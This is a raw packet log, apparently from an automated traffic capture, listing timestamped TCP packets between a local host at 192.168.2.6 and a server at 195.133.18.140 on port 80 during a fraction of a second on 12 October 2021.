Oct 12, 2021 12:35:38.805469036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805491924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805495977 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805516005 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805541039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805548906 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805566072 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805588961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805610895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805618048 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805636883 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805660009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805665016 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805682898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805705070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805728912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805731058 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805753946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805775881 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805784941 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805795908 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805816889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805840015 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805844069 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805861950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805882931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805893898 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805905104 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805927038 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805951118 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805958033 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805969954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806001902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806004047 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806022882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806044102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806065083 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806068897 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806085110 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806104898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806124926 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806133986 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806144953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806169033 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806170940 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806190968 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806210041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806230068 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806237936 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806252003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806273937 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806288004 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806293964 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806317091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806340933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806344986 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806364059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806386948 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806411028 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806411982 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806432962 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806442022 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806457043 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806480885 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806504011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806510925 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806529045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806552887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806576014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806581020 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806598902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806621075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806628942 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806643963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806667089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806689024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806694031 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806714058 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806736946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806740999 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806761026 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806782961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806787014 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806806087 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806827068 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806849003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806854010 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806871891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806895971 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806898117 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806917906 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806941032 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806962967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.806967020 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.806986094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.807008028 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.807029009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.807039022 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.807044983 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.807051897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.807147980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.807154894 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.828625917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828663111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828684092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828705072 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828728914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828752041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828773022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828794956 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828815937 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828836918 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828860998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828865051 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.828881979 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828887939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.828923941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828948021 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828969002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.828969955 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.828988075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829008102 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.829010963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829035044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829058886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829080105 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829092979 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.829099894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829113007 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.829119921 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829138041 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.829138994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829160929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829179049 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.829183102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829207897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829214096 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.829231977 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829253912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829276085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829294920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829313993 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.829510927 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.829524994 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.829529047 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.829531908 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.837120056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837151051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837173939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837194920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837215900 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837239027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837259054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837282896 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.837369919 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.837380886 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.837388039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837412119 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837582111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837605000 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837626934 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837647915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837657928 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.837672949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837694883 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837716103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837735891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837757111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837778091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837800980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837800980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.837871075 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.837965012 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.837996006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.838016987 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.838037968 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.838040113 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.838058949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.838078976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.838109970 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.838257074 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.838306904 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.857784986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.857888937 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.857953072 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.858122110 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.858141899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.858738899 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.858841896 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.858922005 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.858974934 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.858997107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.858999968 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.859074116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.859227896 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.859235048 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.859281063 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.859375954 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.859397888 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.859579086 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.859600067 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.860424042 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.860532999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.861229897 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.861371040 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.861460924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.861659050 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.861665010 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.861758947 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.861861944 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.861886024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.861934900 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.861958981 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.861978054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862003088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862025023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862049103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862065077 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.862072945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862093925 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862123966 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.862135887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862159967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862181902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862205982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862217903 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.862226963 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.862231016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862257957 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862267971 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.862283945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862291098 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.862308025 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862344027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862365007 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862384081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862405062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862426996 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.862431049 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.862483978 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.862570047 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.862577915 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.879843950 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.879882097 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.907562017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.907677889 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.907958984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.907984018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908004999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908025980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908046007 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908058882 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908070087 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908088923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908111095 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908132076 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908150911 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908159018 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908170938 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908185959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908200979 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908221006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908231020 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908240080 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908261061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908269882 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908283949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908308029 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908330917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908339024 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908350945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908370018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908377886 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908390999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908411980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908432007 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908437014 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908452988 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908478022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908502102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908508062 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908531904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908540964 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908559084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908584118 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908592939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908607960 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908632994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908655882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908662081 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908679008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908694029 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908700943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908725023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908750057 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908752918 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908772945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908796072 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908818960 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908824921 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908848047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908858061 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908874035 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908895969 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908905029 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.908914089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908935070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908957958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908978939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.908987045 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909006119 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909033060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909054041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909063101 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909076929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909099102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909121037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909128904 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909142971 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909166098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909169912 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909190893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909214973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909219980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909235954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909259081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909267902 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909281015 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909302950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909326077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909343958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909360886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909368992 CEST	49749	80	192.168.2.6	195.133.18.140
